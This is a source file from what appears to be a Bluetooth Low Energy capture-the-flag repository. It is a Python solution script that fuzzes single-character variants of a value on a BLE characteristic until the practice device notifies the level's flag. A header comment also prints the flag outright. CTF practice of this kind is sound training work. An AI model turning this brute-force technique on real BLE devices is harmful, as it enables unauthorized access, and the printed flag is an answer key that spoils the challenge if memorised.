Fork: 0
0xRoM / BLE_CTF_V2
Transfer to URL with SHA Find file
Newer
Older
BLE_CTF_V2 / lvl_04.py
root on 11 Mar 2022 2 KB tidying for public release
Raw Blame History 
  1. #! /usr/bin/python
  2. import binascii
  3. import struct
  4. import sys, os, time
  5. import bluepy.btle as btle
  6. import itertools
  7.   
  8. '''
  9. 42  0x2A   READ         Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
  10. 44  0x2C   NOTIFY WRITE 
  11. 46  0x2E   READ WRITE   write here to goto to scoreboard
  12.  
  13. Flag: f401f21d02fdd0a4fc00
  14. '''
  15.  
  16. notificationData = ""
  17.  
  18. class MyDelegate(btle.DefaultDelegate):
  19.   def __init__(self, hndl):
  20.     btle.DefaultDelegate.__init__(self)
  21.     self.hndl=hndl;
  22.  
  23.   def handleNotification(self, cHandle, data):
  24.     global notificationData
  25.     notificationData = data
  26.     #print("d: "+data)
  27.  
  28. deviceMAC = open('ctf_mac.txt').read()  
  29. p = btle.Peripheral(deviceMAC)
  30.  
  31. print ("Attached to peripheral")
  32.  
  33. print("Loading level 04")
  34. hex1 = binascii.unhexlify(str('%0*x' % (4,4)))
  35. p.writeCharacteristic(0x30, hex1, withResponse=False)
  36. p.disconnect()
  37.  
  38. '''
  39. # of course not, this brute-force would make sense!
  40. charset = "01234565789ABCDEF"
  41. generator = itertools.chain.from_iterable((''.join(l)
  42.   for l in itertools.product(charset, repeat=i))
  43.   for i in range(4,5))
  44. '''
  45.  
  46. '''
  47. # not this!
  48. print("Generating wordlist")
  49. charset = "01234565789ABCDEF"
  50. generator = itertools.chain.from_iterable((''.join(l)
  51.   for l in itertools.product(charset, repeat=i))
  52.   for i in range(12,13))
  53. '''
  54.  
  55. print("Generating wordlist")
  56. generator = list()
  57. charset = list("0123456789ABCDEF")
  58. origPass = list("AABBCCDDEEFF")
  59. for x in range(len(origPass)): 
  60.   newPass = list("AABBCCDDEEFF")
  61.   for y in range(len(charset)):
  62.     newPass = list("AABBCCDDEEFF")
  63.     newPass[x] = charset[y]
  64.     generator.append("".join(newPass))
  65.  
  66. for password in generator:
  67.   hexlif2 = binascii.unhexlify(password)
  68.   hexlif2 = str(hexlif2)
  69.  
  70.   deviceMAC = open('ctf_mac.txt').read()  
  71.   p = btle.Peripheral(deviceMAC)
  72.  
  73.   try:
  74.     srvs = (p.getServices());
  75.     chs=srvs[2].getCharacteristics();
  76.     ch=chs[1];
  77.     cccd = ch.valHandle + 1
  78.     #print(str(ch)+str(ch.propertiesToString())); # print charchteristic's properties i.e. READ, WRITE, NOTIFY
  79.  
  80.     p.setDelegate(MyDelegate(ch.getHandle()));
  81.     svc=p.getServiceByUUID(0x00FF)
  82.     p.writeCharacteristic(cccd, b"\x01\x00");
  83.  
  84.     sys.stdout.write("\rTrying: %s" % password.rstrip())
  85.     response = p.writeCharacteristic(0x2C, hexlif2)
  86.  
  87.     gotResponse = False
  88.     while gotResponse == False:
  89.       if p.waitForNotifications(1.0):
  90.         rsp = notificationData
  91.         hex = binascii.b2a_hex(rsp)
  92.         hexstr = str(hex).strip("0").upper()
  93.         #sys.stdout.write(" Response: " + hexstr) # for debugging
  94.         
  95.         if(password.strip("0") != hexstr):
  96.           print("\nFlag: %s" % notificationData.rstrip())
  97.           exit()
  98.         else:
  99.           gotResponse = True
  100.           continue
  101.       print "Waiting..."    
  102.     
  103.   finally:            
  104.     p.disconnect()
Buy Me A Coffee